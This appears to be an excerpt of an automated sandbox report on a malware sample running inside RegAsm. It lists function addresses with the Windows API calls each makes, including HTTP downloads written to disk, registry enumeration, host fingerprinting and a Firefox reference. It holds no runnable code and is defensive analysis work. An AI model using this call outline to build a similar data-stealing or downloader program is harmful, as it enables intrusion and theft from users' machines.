                                                    • String ID: Chrysorabdia bivitta is a moth of the subfamily Arctiinae first described by Francis Walker in 1856.$GAS5 noncoding RNA, which accumulates in growth arrested cells, acts as a decoy hormone response element for the glucocorticoid re$Ici Radio-Canada Tl (stylized as ICI Radio-Canada Tl, and sometimes abbreviated as Ici Tl) is a Canadian French-language fre$Niedert is an Ortsgemeinde $Organ perforation is a complete penetration of the wall of a hollow organ in the body, such as the gastrointestinal tract in the c$The KLW SE10B is a low-emissions diesel switcher locomotive built by Knoxville Locomotive Works. It is powered by a single MTU Ser
                                                    • API String ID: 224765317-2971033767
                                                    • Opcode ID: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
                                                    • Instruction ID: 15c8a1cfb45bc9c132fd9fd4faededd5fc4f4c62c30039555f1f88a1b54c1e58
                                                    • Opcode Fuzzy Hash: b2908c616810051979d5b7c1935cb1d71aeefb77bac9279ab48edbe17b9693c0
                                                    • Instruction Fuzzy Hash: 9A213071785268AFDB04EBE9F8C7B5CBBE4EFD4714FA0006FF40496191DEB869408619
                                                    Function 00404AD5 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 197networkmemoryfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404B22
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00404B29
                                                    • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404B54
                                                    • StrCmpCA.SHLWAPI(?), ref: 00404B6D
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BA1
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 00404C00
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00404C38
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C49
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00404C74
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404D05
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404D9B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404DA7
                                                    • InternetCloseHandle.WININET(00000000), ref: 00404DC5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                    • String ID: GET
                                                    • API String ID: 442264750-1805413626
                                                    • Opcode ID: f16c31e6c77223db1b221cad6f523a7c8a9ce9fa98b564ab69779ee6bb960051
                                                    • Instruction ID: d037288fe89579f4ab5843d1a5928f681561e61fb867290b5a494df79b11f7d7
                                                    • Opcode Fuzzy Hash: f16c31e6c77223db1b221cad6f523a7c8a9ce9fa98b564ab69779ee6bb960051
                                                    • Instruction Fuzzy Hash: 769115B4900228AFDF20DF50DC45BEEB7B5BB45306F1040EAE609B6291DB796AC4DF49
                                                    Function 00406312 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406373
                                                    • StrCmpCA.SHLWAPI(?), ref: 00406390
                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004063BE
                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00400100,00000000), ref: 0040640A
                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406442
                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406453
                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0040647E
                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004064F3
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040657C
                                                    • InternetCloseHandle.WININET(00000000), ref: 00406585
                                                    • InternetCloseHandle.WININET(00000000), ref: 0040658E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                    • String ID: ERROR$GET
                                                    • API String ID: 3749127164-3591763792
                                                    • Opcode ID: 963ac1e056751af433d780a8216807e69140fad55e256c3b4c315ddae2ff65c2
                                                    • Instruction ID: 51cd531d8c454c4eabdc451ce72ca3cccbe2bef7883915b0542a7032e80e54d3
                                                    • Opcode Fuzzy Hash: 963ac1e056751af433d780a8216807e69140fad55e256c3b4c315ddae2ff65c2
                                                    • Instruction Fuzzy Hash: 9E710871900218EFDF21EFA0DC45BDD7B75AB05305F6040AAF606BA1E0DBB96A94CF49
                                                    Function 00418167 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 749COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411715: lstrlenA.KERNEL32(?,?,?,00419018,00425200,00425200,?,?,?,0041ABB6), ref: 0041171F
                                                      • Part of subcall function 00411715: lstrcpyA.KERNEL32(0041ABB6,00000000,?,00419018,00425200,00425200), ref: 0041176D
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004182BD
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418321
                                                      • Part of subcall function 0041177A: lstrcpyA.KERNEL32(00000000,?,?,?,0041A98C,00000000,?,?,00428E5C,?,00000000), ref: 004117D3
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 00417E48: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00417E8B
                                                      • Part of subcall function 00417F35: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00417F96
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 00417FAD
                                                      • Part of subcall function 00417F35: StrStrA.SHLWAPI(00000000,00000000), ref: 00417FDD
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 00417FF9
                                                      • Part of subcall function 00417F35: lstrlenA.KERNEL32(00000000), ref: 0041801F
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041840E
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418519
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00418606
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418711
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004187FE
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418909
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00418B01
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen
                                                    • String ID: ERROR
                                                    • API String ID: 2001356338-2861137601
                                                    • Opcode ID: 601a58bd0b0876066a53ea39e9bf7ef070bc13c226733b0f19d5a4e6bce83ed6
                                                    • Instruction ID: 2f695ca300a8a73312befe9c8800e9116e76318d555d5372ca32ba18f7f60556
                                                    • Opcode Fuzzy Hash: 601a58bd0b0876066a53ea39e9bf7ef070bc13c226733b0f19d5a4e6bce83ed6
                                                    • Instruction Fuzzy Hash: 2D4232719001085ACB14FBF1ED5B9EE7378AF10305F90416FF516A61E2EF7C9A88CA99
                                                    Function 00411948 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 116memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00411964
                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004119A1
                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411A18
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00411A1F
                                                    • wsprintfA.USER32 ref: 00411A54
                                                    • lstrcatA.KERNEL32(00000000,00429270), ref: 00411A65
                                                      • Part of subcall function 00412667: GetCurrentHwProfileA.ADVAPI32(?), ref: 00412674
                                                    • lstrlenA.KERNEL32(00000000), ref: 00411A7E
                                                      • Part of subcall function 004136CE: malloc.MSVCRT ref: 004136D5
                                                      • Part of subcall function 004136CE: strncpy.MSVCRT ref: 004136EB
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00411AAC
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
                                                    • String ID: :$C$\
                                                    • API String ID: 2389002695-3809124531
                                                    • Opcode ID: 23f1d57f010f06b3a3b0b73a3a18805c0e588e37821cf8b5f81c9e51efc94560
                                                    • Instruction ID: b4310f208fa9535f9906633d23b413fd942b8933ce9b069d1c57af1ba558f1c2
                                                    • Opcode Fuzzy Hash: 23f1d57f010f06b3a3b0b73a3a18805c0e588e37821cf8b5f81c9e51efc94560
                                                    • Instruction Fuzzy Hash: EC417E71D0024CAFDF10EBA0DD59BED7BB8AF05305F10009AF219A61A1DB799BC4CB68
                                                    Function 0041218B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 164registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00411668: lstrcpyA.KERNEL32(00425200,00000000,?), ref: 004116A7
                                                    • RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00000000,00425200), ref: 004121DE
                                                    • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00412259
                                                    • wsprintfA.USER32 ref: 0041228B
                                                    • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 004122AC
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Openlstrcpy$Enumwsprintf
                                                    • String ID: - $%s\%s$?
                                                    • API String ID: 2731306069-3278919252
                                                    • Opcode ID: db84e063afdd8ab9a369cff0a91b897787bc4edace59e265c4489125e3bbefbc
                                                    • Instruction ID: 317e1264205bd673c815d3a78023c7176152d2c53d3ea0851a7731e254f809d5
                                                    • Opcode Fuzzy Hash: db84e063afdd8ab9a369cff0a91b897787bc4edace59e265c4489125e3bbefbc
                                                    • Instruction Fuzzy Hash: 1C71F47290012CABEB64EB50DD45FD973B9BF04305F5086EAE209A20A1DF746BC9CF94
                                                    Function 0040613F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 130networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404373
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 00404387
                                                      • Part of subcall function 0040430F: ??_U@YAPAXI@Z.MSVCRT ref: 0040439B
                                                      • Part of subcall function 0040430F: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 004043B9
                                                      • Part of subcall function 0040430F: InternetCrackUrlA.WININET(00000000,00000000), ref: 004043C9
                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004061A8
                                                    • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,?), ref: 004061E6
                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00406229
                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?), ref: 0040624D
                                                    • InternetReadFile.WININET(8cA,?,00000400,?), ref: 00406271
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?), ref: 0040629D
                                                    • CloseHandle.KERNEL32(?,?,00000400,?,?,?,?,?,?,?), ref: 004062DB
                                                    • InternetCloseHandle.WININET(8cA), ref: 004062E4
                                                    • InternetCloseHandle.WININET(?), ref: 004062F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                    • String ID: 8cA
                                                    • API String ID: 2507841554-2586977368
                                                    • Opcode ID: 23bbd80859a5ae626456c0e29d0c535548952ba2e1dd46435b22cc47d41a132e
                                                    • Instruction ID: 322e9e665ac9740ae3a6c79426317fb00e7d6d1b0345a24b3972b26df0cd3c85
                                                    • Opcode Fuzzy Hash: 23bbd80859a5ae626456c0e29d0c535548952ba2e1dd46435b22cc47d41a132e
                                                    • Instruction Fuzzy Hash: BC515CB190021CABDF20EF60DC45BED7779FB01305F1050AAE616BA1E1DB786A99CF58
                                                    Function 0040F99F Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 360COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040F9EF
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FA75
                                                    • StrCmpCA.SHLWAPI(00000000,?,?), ref: 0040FB84
                                                      • Part of subcall function 004116B4: lstrcpyA.KERNEL32(?,?,?,?,004118C6,00000000), ref: 004116F4
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FC57
                                                    • StrCmpCA.SHLWAPI(00000000), ref: 0040FCDD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy
                                                    • String ID: Stable\$firefox
                                                    • API String ID: 3722407311-3160656979
                                                    • Opcode ID: 4574c3fe41a2655a61f88f0eef0b3d3de2eb2ac0277edcd828de38c39bfa1635
                                                    • Instruction ID: 87d147e04e3a24980a39275aa9b0abb6dd5f2e96552c08bd51d602dc9e077d04
                                                    • Opcode Fuzzy Hash: 4574c3fe41a2655a61f88f0eef0b3d3de2eb2ac0277edcd828de38c39bfa1635
                                                    • Instruction Fuzzy Hash: 18D16772A001099BCF24FBB5DD96FDD77B9BB50304F10402AE906EB1A1EE35DA48C795
                                                    Function 00412081 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,00428E48,00000000,?,00000000,00000000,?,Windows: ,00000000,?,00428FE4,00000000,?,Work Dir: In memory), ref: 0041208E
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00412095
                                                    • GlobalMemoryStatusEx.KERNEL32(00000040), ref: 004120B6
                                                    • __aulldiv.LIBCMT ref: 004120CE
                                                    • __aulldiv.LIBCMT ref: 004120DC
                                                    • wsprintfA.USER32 ref: 004120FF
                                                    Strings
                                                    Memory Dump Source
